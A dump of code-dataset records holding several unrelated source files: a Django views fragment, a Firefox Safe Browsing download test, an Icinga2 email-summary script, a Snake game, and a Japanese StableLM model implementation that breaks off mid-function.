Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_delete.html',{'character':character})\n\ndef add_house(request):\n\ttry:\n\t\thouse = House.objects.get(pk=pk)\n\texcept House.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_house.html',{'house':house})\n\ndef add_battle(request):\n\ttry:\n\t\tbattle = Battle.objects.get(pk=pk)\n\texcept Battle.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_battle.html',{'battle':battle})\n\n","repo_name":"csanjeev25/GameofThrones","sub_path":"GameofThronesApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9033618960","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\n\nfrom firefox_puppeteer import PuppeteerMixin\nfrom marionette_driver import Wait\nfrom marionette_harness import MarionetteTestCase\n\n\nclass TestSafeBrowsingInitialDownload(PuppeteerMixin, MarionetteTestCase):\n\n file_extensions = [\n 'pset',\n 'sbstore',\n ]\n\n prefs_download_lists = [\n 'urlclassifier.blockedTable',\n 'urlclassifier.downloadAllowTable',\n 'urlclassifier.downloadBlockTable',\n 'urlclassifier.malwareTable',\n 'urlclassifier.phishTable',\n 'urlclassifier.trackingTable',\n 'urlclassifier.trackingWhitelistTable',\n ]\n\n prefs_provider_update_time = {\n # Force an immediate download of the safebrowsing files\n 'browser.safebrowsing.provider.google.nextupdatetime': 1,\n 'browser.safebrowsing.provider.mozilla.nextupdatetime': 1,\n }\n\n prefs_safebrowsing = {\n 'browser.safebrowsing.debug': True,\n 'browser.safebrowsing.blockedURIs.enabled': True,\n 'browser.safebrowsing.downloads.enabled': True,\n 'browser.safebrowsing.phishing.enabled': True,\n 'browser.safebrowsing.malware.enabled': True,\n 'privacy.trackingprotection.enabled': True,\n 'privacy.trackingprotection.pbmode.enabled': True,\n }\n\n def get_safebrowsing_files(self):\n files = []\n for pref_name in self.prefs_download_lists:\n base_names = self.marionette.get_pref(pref_name).split(',')\n for ext in self.file_extensions:\n files.extend(['{file}.{ext}'.format(file=f, ext=ext) for f in base_names if f])\n\n return set(sorted(files))\n\n def setUp(self):\n super(TestSafeBrowsingInitialDownload, self).setUp()\n\n # Force the preferences for the new profile\n enforce_prefs = self.prefs_safebrowsing\n enforce_prefs.update(self.prefs_provider_update_time)\n self.marionette.enforce_gecko_prefs(enforce_prefs)\n\n self.safebrowsing_path = os.path.join(self.marionette.instance.profile.profile,\n 'safebrowsing')\n self.safebrowsing_files = self.get_safebrowsing_files()\n\n def tearDown(self):\n try:\n # Restart with a fresh profile\n self.restart(clean=True)\n finally:\n super(TestSafeBrowsingInitialDownload, self).tearDown()\n\n def test_safe_browsing_initial_download(self):\n def check_downloaded(_):\n return reduce(lambda state, pref: state and int(self.marionette.get_pref(pref)) != 1,\n self.prefs_provider_update_time.keys(), True)\n\n try:\n Wait(self.marionette, timeout=60).until(\n check_downloaded, message='Not all safebrowsing files have been downloaded')\n finally:\n self.assertSetEqual(self.safebrowsing_files, set(os.listdir(self.safebrowsing_path)))\n","repo_name":"mozilla/positron","sub_path":"testing/firefox-ui/tests/functional/security/test_safe_browsing_initial_download.py","file_name":"test_safe_browsing_initial_download.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"68"} +{"seq_id":"71923501657","text":"#!/usr/bin/env python3\n\nimport logging\nfrom os import path\nfrom datetime import datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTP\n\nfrom icinga2apic.client import Client\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\nfrom config import (from_addr, host_colors, icinga_apipassword, icinga_apiuser,\n icinga_host, log_file, log_format, log_level, send_mail,\n service_colors, smtp_host, smtp_password, smtp_port,\n smtp_username, subject, use_allowlist)\n\nhost_states = {0: \"UP\",\n 1: \"UP\",\n 2: \"DOWN\",\n 3: \"DOWN\"}\n\n\nservice_states = {0: \"OK\",\n 1: \"WARNING\",\n 2: \"CRITICAL\",\n 3: \"UNKNOWN\"}\n\nroot = path.dirname(path.abspath(__file__))\n\ndef notifications_recipients(host):\n \"\"\"Retrieve all users of a host, that want to receive emails\"\"\"\n vars = host.get('vars', {})\n if vars is None:\n return None\n return vars.get('notification', {}).get('mail', {}).get('users')\n\n\ndef timestamp2str(timestamp):\n \"\"\"Convert Unix timestamp to a string\"\"\"\n time = datetime.fromtimestamp(timestamp)\n time_format = \"%H:%M\" if time.date() == datetime.today().date() else \"%d-%b-%y\"\n return time.strftime(time_format)\n\n\ndef setup():\n \"\"\"Sets up the logging, the icinga2 client and the email body template\"\"\"\n logging.basicConfig(filename=log_file, filemode='w', format=log_format,\n level=log_level)\n logging.info('Creating Icinga Email-Summary...')\n\n # set up the icinga2 client (https://github.com/TeraIT-at/icinga2apic)\n client = Client(icinga_host, icinga_apiuser, icinga_apipassword)\n\n # set up jinja2 template\n templates_dir = path.join(root, 'templates')\n env = Environment(\n loader=FileSystemLoader(templates_dir),\n autoescape=select_autoescape()\n )\n mail_template = env.get_template('email.html')\n\n return client, mail_template\n\n\ndef retrieve_and_clean_api_data(client):\n \"\"\"\n Retrieves users, hosts, services from the Icinga API.\n Removes everything except the 'attrs' field.\n Tranforms users and hosts to dictionaries to get faster access.\n \"\"\"\n user_attrs = ['email']\n users = client.objects.list('User', attrs=user_attrs)\n users = {user['name']: user['attrs'] for user in users}\n\n host_attrs = ['address', 'display_name', 'handled', 'last_check_result',\n 'last_hard_state_change', 'problem', 'vars']\n hosts = client.objects.list('Host', attrs=host_attrs)\n hosts = {host['name']: host['attrs'] for host in hosts}\n\n service_attrs = ['display_name', 'host_name', 'last_check_result',\n 'last_hard_state_change']\n services = client.objects.list('Service',\n filters='match(\"True\", service.problem) && '\n 'match(\"False\", service.handled) && '\n 'match(\"True\", service.last_reachable)',\n attrs=service_attrs)\n services = [service['attrs'] for service in services]\n services = sorted(services, key=lambda d: d['last_hard_state_change'],\n reverse=True)\n return users, hosts, services\n\n\ndef sorting(x):\n \"\"\"\n Hosts are sorted by the change_time of their most recent service problem. If\n the host itself is down, its own change_time is used.\n \"\"\"\n return x['services'][0]['change_time'] if len(x['services']) > 0 else x[\n 'change_time']\n\n\ndef assign_services_to_hosts(services, hosts):\n \"\"\"\n Hosts are reduced to their essential information, that is then recognized\n by the jinja2 template. Services are assigned to their corresponding host.\n \"\"\"\n problem_hosts = {}\n for host_name, host_info in hosts.items():\n if host_info['problem'] and not host_info['handled']:\n timestamp = host_info['last_hard_state_change']\n time_str = timestamp2str(timestamp)\n problem_hosts[host_name] = {'name': host_name,\n 'address': host_info['address'],\n 'state': host_info['last_check_result']['state'],\n 'recipients': notifications_recipients(host_info),\n 'change_time': timestamp,\n 'change_time_str': time_str,\n 'output': host_info['last_check_result']['output'],\n 'services': []}\n for service_info in services:\n service_host = hosts[service_info['host_name']]\n timestamp = service_info['last_hard_state_change']\n time_str = timestamp2str(timestamp)\n service = {'name': service_info['display_name'],\n 'state': service_info['last_check_result']['state'],\n 'change_time': timestamp,\n 'change_time_str': time_str,\n 'output': service_info['last_check_result']['output'],\n 'services': []}\n default_host = {'name': service_host['display_name'],\n 'address': service_host['address'],\n 'state': service_host['last_check_result']['state'],\n 'recipients': notifications_recipients(service_host),\n 'change_time_str': timestamp2str(service_host['last_hard_state_change']),\n 'output': None,\n 'services': []}\n # if host does not exist yet in host_problems, create a new one and add the service\n problem_hosts.setdefault(service_info['host_name'], default_host)[\n 'services'].append(service)\n\n problem_hosts = list(problem_hosts.values())\n problem_hosts = sorted(problem_hosts, key=sorting, reverse=True)\n\n return problem_hosts\n\n\ndef assign_hosts_to_users(problem_hosts, users):\n \"\"\"\n Creates a dictionary of all to be contacted email-addresses and their\n corresponding host problems.\n \"\"\"\n # keys: user email address, value: hosts for which user should receive emails\n user_notifications = {}\n\n # assign each user its hosts\n for host in problem_hosts:\n recipients = host['recipients']\n if recipients:\n for recipient in recipients:\n emails = users[recipient].get('email').replace(' ', '').split(',')\n for mail_address in emails:\n if mail_address: # filter out empty strings\n user_notifications.setdefault(mail_address, []).append(host)\n\n return user_notifications\n\n\ndef send_emails(smtp, user_notifications, mail_template):\n \"\"\"Creates the email body from the template and sends it.\"\"\"\n allowlist = []\n if use_allowlist:\n allowlist_path = path.join(root, 'allowlist.txt')\n with open(allowlist_path, 'r') as f:\n for line in f:\n allowlist.append(line.rstrip('\\n'))\n\n for mail_address, host_list in user_notifications.items():\n if use_allowlist and mail_address not in allowlist:\n continue\n\n try:\n msg = MIMEMultipart('alternative')\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = mail_address\n msg_body = mail_template.render(hosts=host_list,\n host_colors=host_colors,\n service_colors=service_colors,\n host_states=host_states,\n service_states=service_states)\n msg.attach(MIMEText(msg_body, 'html'))\n\n if send_mail:\n smtp.sendmail(from_addr, mail_address, msg.as_string())\n except Exception:\n logging.exception(f'Could not send email to {mail_address}')\n\n\ndef main():\n icinga2_client, mail_template = setup()\n with SMTP(smtp_host, smtp_port) as smtp:\n if smtp_username and smtp_password:\n smtp.login(smtp_username, smtp_password)\n\n users, hosts, services = retrieve_and_clean_api_data(icinga2_client)\n problem_hosts = assign_services_to_hosts(services, hosts)\n user_notifications = assign_hosts_to_users(problem_hosts, users)\n\n send_emails(smtp, user_notifications, mail_template)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"faberno/icinga2-email-summary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13122260183","text":"from turtle import Screen\nimport time\nfrom Snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"black\")\nscreen.title(titlestring=\"Snake Game\")\nscreen.tracer(0)\nscoreboard = Scoreboard()\nfood = Food()\nsnake = Snake()\n\n\nscreen.listen()\nscreen.onkey(key=\"Up\", fun=snake.move_up)\nscreen.onkey(key=\"Down\", fun=snake.move_down)\nscreen.onkey(key=\"Left\", fun=snake.move_left)\nscreen.onkey(key=\"Right\", fun=snake.move_right)\n\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n snake.move()\n\n if snake.head.distance(food) < 15:\n food.update()\n scoreboard.addScore()\n snake.extend()\n\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\n scoreboard.reset()\n snake.reset()\n\n for segment in snake.segments[1:]:\n if snake.head.distance(segment) < 10:\n scoreboard.reset()\n snake.reset()\n\n\n\nscreen.exitonclick()\n","repo_name":"kar1221/snakeGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36532840668","text":"from typing import Optional, Tuple, Union\n\nimport torch\nimport torch.utils.checkpoint\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom transformers.modeling_outputs import (BaseModelOutputWithPast,\n CausalLMOutputWithPast)\nfrom transformers.modeling_utils import PreTrainedModel\nfrom transformers.utils import logging\n\nfrom .configuration_japanese_stablelm_alpha import JapaneseStableLMAlphaConfig\n\nlogger = logging.get_logger(__name__)\n\n\nclass JapaneseStableLMAlphaPreTrainedModel(PreTrainedModel):\n \"\"\"\n An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained\n models.\n \"\"\"\n\n config_class = JapaneseStableLMAlphaConfig\n base_model_prefix = \"transformer\"\n supports_gradient_checkpointing = True\n _no_split_modules = [\"DecoderLayer\"]\n _skip_keys_device_placement = \"past_key_values\"\n\n def _init_weights(self, module):\n \"\"\"Initialize the weights\"\"\"\n if isinstance(module, nn.Linear):\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n elif isinstance(module, nn.LayerNorm):\n if module.bias is not None:\n module.bias.data.zero_()\n if module.weight is not None:\n module.weight.data.fill_(1.0)\n\n def _set_gradient_checkpointing(self, module, value=False):\n if isinstance(module, JapaneseStableLMAlphaModel):\n module.gradient_checkpointing = value\n\n\nclass JapaneseStableLMAlphaModel(JapaneseStableLMAlphaPreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n\n self.embed_in = nn.Embedding(config.vocab_size, config.hidden_size)\n self.layers = nn.ModuleList(\n [DecoderLayer(config) for _ in range(config.num_hidden_layers)]\n )\n self.final_layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n\n self.gradient_checkpointing = False\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_input_embeddings(self):\n return self.embed_in\n\n def set_input_embeddings(self, value):\n self.embed_in = value\n\n def forward(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n position_ids: Optional[torch.LongTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n past_key_values: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, BaseModelOutputWithPast]:\n r\"\"\"\n past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):\n Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.\n If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that\n don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all\n `decoder_input_ids` of shape `(batch_size, sequence_length)`.\n use_cache (`bool`, *optional*):\n If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see\n `past_key_values`).\n \"\"\"\n output_attentions = (\n output_attentions if output_attentions is not None else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot specify both input_ids and inputs_embeds at the same time\"\n )\n elif input_ids is not None:\n input_shape = input_ids.size()\n elif inputs_embeds is not None:\n input_shape = inputs_embeds.size()[:-1]\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n batch_size, seq_length = input_shape\n\n if past_key_values is None:\n past_length = 0\n past_key_values = tuple([None] * self.config.num_hidden_layers)\n else:\n past_length = past_key_values[0][0].size(-2)\n\n if position_ids is None:\n device = input_ids.device if input_ids is not None else inputs_embeds.device\n position_ids = torch.arange(\n past_length, seq_length + past_length, dtype=torch.long, device=device\n )\n position_ids = position_ids.unsqueeze(0).view(-1, seq_length)\n else:\n position_ids = position_ids.view(-1, seq_length).long()\n\n # Attention mask.\n if attention_mask is not None:\n assert batch_size > 0, \"batch_size has to be defined and > 0\"\n attention_mask = attention_mask.view(batch_size, -1)\n # We create a 3D attention mask from a 2D tensor mask.\n # Sizes are [batch_size, 1, 1, to_seq_length]\n # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]\n # this attention mask is more simple than the triangular masking of causal attention\n # used in OpenAI GPT, we just need to prepare the broadcast dimension here.\n attention_mask = attention_mask[:, None, None, :]\n\n # Since attention_mask is 1.0 for positions we want to attend and 0.0 for\n # masked positions, this operation will create a tensor which is 0.0 for\n # positions we want to attend and the dtype's smallest value for masked positions.\n # Since we are adding it to the raw scores before the softmax, this is\n # effectively the same as removing these entirely.\n attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility\n attention_mask = (1.0 - attention_mask) * torch.finfo(self.dtype).min\n\n # Prepare head mask if needed\n # 1.0 in head_mask indicate we keep the head\n # attention_probs has shape bsz x n_heads x N x N\n # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]\n # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]\n head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_in(input_ids)\n\n hidden_states = inputs_embeds\n\n if self.gradient_checkpointing and self.training:\n if use_cache:\n logger.warning(\n \"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`...\"\n )\n use_cache = False\n\n presents = () if use_cache else None\n all_attentions = () if output_attentions else None\n all_hidden_states = () if output_hidden_states else None\n for i, (layer, layer_past) in enumerate(zip(self.layers, past_key_values)):\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n if self.gradient_checkpointing and self.training:\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n # None for layer_past\n return module(*inputs, use_cache, None, output_attentions)\n\n return custom_forward\n\n outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(layer),\n hidden_states,\n attention_mask,\n position_ids,\n head_mask[i],\n )\n else:\n outputs = layer(\n hidden_states,\n attention_mask=attention_mask,\n position_ids=position_ids,\n head_mask=head_mask[i],\n layer_past=layer_past,\n use_cache=use_cache,\n output_attentions=output_attentions,\n )\n hidden_states = outputs[0]\n if use_cache is True:\n presents = presents + (outputs[1],)\n if output_attentions:\n all_attentions = all_attentions + (outputs[2 if use_cache else 1],)\n\n hidden_states = self.final_layer_norm(hidden_states)\n # Add last hidden state\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, presents, all_hidden_states, all_attentions]\n if v is not None\n )\n\n return BaseModelOutputWithPast(\n last_hidden_state=hidden_states,\n past_key_values=presents,\n hidden_states=all_hidden_states,\n attentions=all_attentions,\n )\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.use_parallel_residual = config.use_parallel_residual\n self.input_layernorm = nn.LayerNorm(\n config.hidden_size,\n eps=config.layer_norm_eps,\n elementwise_affine=False,\n )\n self.post_attention_layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.attention = Attention(config)\n self.mlp = MLP(config)\n\n def forward(\n self,\n hidden_states: Optional[torch.FloatTensor],\n attention_mask: Optional[torch.FloatTensor] = None,\n position_ids: Optional[torch.LongTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n use_cache: Optional[bool] = False,\n layer_past: Optional[Tuple[torch.Tensor]] = None,\n output_attentions: Optional[bool] = False,\n ):\n attention_layer_outputs = self.attention(\n self.input_layernorm(hidden_states),\n attention_mask=attention_mask,\n position_ids=position_ids,\n layer_past=layer_past,\n head_mask=head_mask,\n use_cache=use_cache,\n output_attentions=output_attentions,\n )\n attn_output = attention_layer_outputs[\n 0\n ] # output_attn: attn_output, present, (attn_weights)\n outputs = attention_layer_outputs[1:]\n\n mlp_output = self.mlp(self.post_attention_layernorm(hidden_states))\n hidden_states = hidden_states + mlp_output + attn_output\n\n if use_cache:\n outputs = (hidden_states,) + outputs # hidden_states, present, (attn_weights)\n else:\n outputs = (hidden_states,) + outputs[1:] # hidden_states, (attn_weights)\n\n return outputs\n\n\nclass MLP(nn.Module):\n def __init__(self, config: JapaneseStableLMAlphaConfig):\n super().__init__()\n hidden_size = config.hidden_size\n multiple_of = 256\n ff_dim = int(8 * hidden_size / 3)\n intermediate_size = multiple_of * ((ff_dim + multiple_of - 1) // multiple_of)\n\n self.packed_input_proj = torch.nn.Linear(hidden_size, 2 * intermediate_size, bias=False)\n self.out_proj = nn.Linear(intermediate_size, hidden_size, bias=False)\n self.act = nn.SiLU()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n ff, ff_gate = self.packed_input_proj(x).chunk(2, dim=-1)\n return self.out_proj(ff * self.act(ff_gate))\n\n\nclass RotaryEmbedding(torch.nn.Module):\n \"\"\"Based on Tri Dao's XPos: https://github.com/HazyResearch/flash-attention/blob/main/flash_attn/layers/rotary.py\"\"\"\n\n def __init__(\n self,\n dim: int,\n max_position_embeddings: int,\n base: int = 10_000,\n scale_base: int = 512,\n device: str = None,\n ):\n super().__init__()\n self.dim = dim\n self.seq_len_cached = max_position_embeddings\n\n # Set up `inv_freq` term\n inv_freq = 1.0 / (\n base ** (torch.arange(0, dim, 2, device=device, dtype=torch.float32) / dim)\n )\n self.register_buffer(\"inv_freq\", inv_freq)\n\n # Set up `scale` term\n self.scale_base = scale_base\n scale = (\n (torch.arange(0, dim, 2, device=device, dtype=torch.float32) + 0.4 * dim) / (1.4 * dim)\n if scale_base is not None\n else None\n )\n self.register_buffer(\"scale\", scale)\n\n # Seet up `cos..` and `sin...` cache terms\n t = torch.arange(self.seq_len_cached, device=device, dtype=torch.float32)\n freqs = torch.outer(t, self.inv_freq)\n # freqs = torch.cat((freqs, freqs), dim=-1)\n seq_range = torch.arange(\n self.seq_len_cached, dtype=self.scale.dtype, device=self.scale.device\n )\n power = (seq_range - self.seq_len_cached // 2) / self.scale_base\n scale_cached = self.scale.to(device=power.device) ** power.unsqueeze(-1)\n # scale_cached = torch.cat((scale_cached, scale_cached), dim=-1)\n self.register_buffer(\"cos_cached\", torch.cos(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"sin_cached\", torch.sin(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"cos_k_cached\", torch.cos(freqs) / scale_cached, persistent=False)\n self.register_buffer(\"sin_k_cached\", torch.sin(freqs) / scale_cached, persistent=False)\n\n def forward(self, x, seq_len=None):\n if seq_len > self.seq_len_cached:\n self.seq_len_cached = seq_len\n t = torch.arange(seq_len, device=x.device, dtype=torch.float32)\n freqs = torch.outer(t, self.inv_freq)\n freqs = torch.cat((freqs, freqs), dim=-1)\n seq_range = torch.arange(\n self.seq_len_cached, dtype=self.scale.dtype, device=self.scale.device\n )\n power = (seq_range - self.seq_len_cached // 2) / self.scale_base\n scale_cached = self.scale.to(device=power.device) ** power.unsqueeze(-1)\n scale_cached = torch.cat((scale_cached, scale_cached), dim=-1)\n self.register_buffer(\"cos_cached\", torch.cos(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"sin_cached\", torch.sin(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"cos_k_cached\", torch.cos(freqs) / scale_cached, persistent=False)\n self.register_buffer(\"sin_k_cached\", torch.sin(freqs) / scale_cached, persistent=False)\n return (\n self.cos_cached[:seq_len, ...],\n self.sin_cached[:seq_len, ...],\n self.cos_k_cached[:seq_len, ...],\n self.sin_k_cached[:seq_len, ...],\n )\n\n\ndef rotate_half(x):\n x1, x2 = x.chunk(2, dim=-1)\n return torch.cat((-x2, x1), dim=-1)\n\n\ndef apply_rotary_pos_emb(q, k, cos, sin, position_ids, cos_k=None, sin_k=None):\n \"\"\"\n q, k: [bs, num_heads, seq_len, rot_dim]\n cos, sin: [seq_len, rot_dim / 2]\n position_ids: [bs, seq_len]\n \"\"\"\n # print(f\"q: {q.shape}, k: {k.shape}, cos: {cos.shape}, sin: {sin.shape}, position_ids: {position_ids.shape}\")\n import einops\n\n cos = einops.repeat(cos, \"s r -> s (2 r)\")\n sin = einops.repeat(sin, \"s r -> s (2 r)\")\n cos_k = einops.repeat(cos_k, \"s r -> s (2 r)\")\n sin_k = einops.repeat(sin_k, \"s r -> s (2 r)\")\n cos = cos[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n sin = sin[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n cos_k = cos_k[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n sin_k = sin_k[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n\n q_embed = (q * cos) + (rotate_half(q) * sin)\n k_embed = (k * cos_k) + (rotate_half(k) * sin_k)\n return q_embed, k_embed\n\n\nclass Attention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.num_attention_heads = config.num_attention_heads\n self.hidden_size = config.hidden_size\n if self.hidden_size % self.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size is not divisble by the number of attention heads! Make sure to update them\"\n )\n self.head_size = self.hidden_size // self.num_attention_heads\n\n max_positions = config.max_position_embeddings\n self.register_buffer(\n \"bias\",\n torch.tril(torch.ones((max_positions, max_positions), dtype=torch.bool)).view(\n 1, 1, max_positions, max_positions\n ),\n persistent=False,\n )\n self.register_buffer(\"masked_bias\", torch.tensor(-1e9), persistent=False)\n\n self.rotary_ndims = int(self.head_size * config.rotary_pct)\n self.rotary_emb = RotaryEmbedding(\n self.rotary_ndims,\n max_position_embeddings=config.max_position_embeddings,\n base=config.rotary_emb_base,\n scale_base=config.rotary_scale_base,\n )\n\n self.register_buffer(\n \"norm_factor\",\n torch.sqrt(torch.tensor(self.head_size, dtype=torch.float32)).to(\n torch.get_default_dtype()\n ),\n persistent=False,\n )\n\n self.query_key_value = nn.Linear(self.hidden_size, 3 * self.hidden_size, bias=False)\n self.dense = nn.Linear(self.hidden_size, self.hidden_size, bias=False)\n\n def forward(\n self,\n hidden_states: torch.FloatTensor,\n attention_mask: torch.FloatTensor,\n position_ids: torch.LongTensor,\n head_mask: Optional[torch.FloatTensor] = None,\n layer_past: Optional[Tuple[torch.Tensor]] = None,\n use_cache: Optional[bool] = False,\n output_attentions: Optional[bool] = False,\n ):\n has_layer_past = layer_past is not None\n\n # Compute QKV\n # Attention heads [batch, seq_len, hidden_size]\n # --> [batch, seq_len, (np * 3 * head_size)]\n qkv = self.query_key_value(hidden_states)\n\n # [batch, seq_len, (num_heads * 3 * head_size)]\n # --> [batch, seq_len, num_heads, 3 * head_size]\n new_qkv_shape = qkv.size()[:-1] + (self.num_attention_heads, 3 * self.head_size)\n qkv = qkv.view(*new_qkv_shape)\n\n # [batch, seq_len, num_attention_heads, 3 * head_size] --> 3 [batch, num_attention_heads, seq_len, head_size]\n query = qkv[..., : self.head_size].permute(0, 2, 1, 3)\n key = qkv[..., self.head_size : 2 * self.head_size].permute(0, 2, 1, 3)\n value = qkv[..., 2 * self.head_size :].permute(0, 2, 1, 3)\n\n # Compute rotary embeddings on rotary_ndims\n query_rot = query[..., : self.rotary_ndims]\n query_pass = query[..., self.rotary_ndims :]\n key_rot = key[..., : self.rotary_ndims]\n key_pass = key[..., self.rotary_ndims :]\n\n # Compute token offset for rotary embeddings (when decoding)\n kv_seq_len = key.shape[-2]\n if has_layer_past:\n kv_seq_len += layer_past[0].shape[-2]\n\n # Add rotary embeddings to query and key\n # TODO: Check if using xpos\n cos, sin, cos_k, sin_k = self.rotary_emb(value, seq_len=kv_seq_len)\n query, key = apply_rotary_pos_emb(\n query_rot, key_rot, cos, sin, position_ids, cos_k=cos_k, sin_k=sin_k\n )\n\n query = torch.cat((query, query_pass), dim=-1)\n key = torch.cat((key, key_pass), dim=-1)\n\n # Cache QKV values\n if has_layer_past:\n past_key = layer_past[0]\n past_value = layer_past[1]\n key = torch.cat((past_key, key), dim=-2)\n value = torch.cat((past_value, value), dim=-2)\n present = (key, value) if use_cache else None\n\n # Compute attention\n attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask)\n\n # Merge attn_head_size dim and num_attn_heads dim into hidden dim\n # [bs, seq_len, num_attention_heads, attn_head_size]\n attn_output = attn_output.permute(0, 2, 1, 3).contiguous()\n attn_output = attn_output.view(\n attn_output.size(0), attn_output.size(1), self.num_attention_heads * self.head_size\n )\n\n attn_output = self.dense(attn_output)\n\n outputs = (attn_output, present)\n if output_attentions:\n outputs += (attn_weights,)\n\n return outputs\n\n def _attn(self, query, key, value, attention_mask=None, head_mask=None):\n # q, k, v: [bs, num_attention_heads, seq_len, attn_head_size]\n # compute causal mask from causal mask buffer\n\n batch_size, num_attention_heads, query_length, attn_head_size = query.size()\n key_length = key.size(-2)\n\n causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length]\n\n query = query.view(batch_size * num_attention_heads, query_length, attn_head_size)\n key = key.view(batch_size * num_attention_heads, key_length, attn_head_size)\n attn_scores = torch.zeros(\n batch_size * num_attention_heads,\n query_length,\n key_length,\n dtype=query.dtype,\n device=key.device,\n )\n attn_scores = torch.baddbmm(\n attn_scores,\n query,\n key.transpose(1, 2),\n beta=1.0,\n alpha=(\n torch.tensor(1.0, dtype=self.norm_factor.dtype, device=self.norm_factor.device)\n / self.norm_factor\n ),\n )\n attn_scores = attn_scores.view(batch_size, num_attention_heads, query_length, key_length)\n\n mask_value = torch.finfo(attn_scores.dtype).min\n # Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`.\n # Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device`\n mask_value = torch.tensor(mask_value, dtype=attn_scores.dtype, device=attn_scores.device)\n attn_scores = torch.where(causal_mask, attn_scores, mask_value)\n\n if attention_mask is not None:\n # Apply the attention mask\n attn_scores = attn_scores + attention_mask\n\n # NOTE: Upcast to float32\n attn_weights = nn.functional.softmax(attn_scores, dim=-1, dtype=torch.float32).type_as(\n value\n )\n\n # Mask heads if we want to\n if head_mask is not None:\n attn_weights = attn_weights * head_mask\n\n attn_output = torch.matmul(attn_weights, value)\n return attn_output, attn_weights\n\n\ndef attention_mask_func(attention_scores, ltor_mask):\n attention_scores.masked_fill_(~ltor_mask, torch.finfo(attention_scores.dtype).min)\n 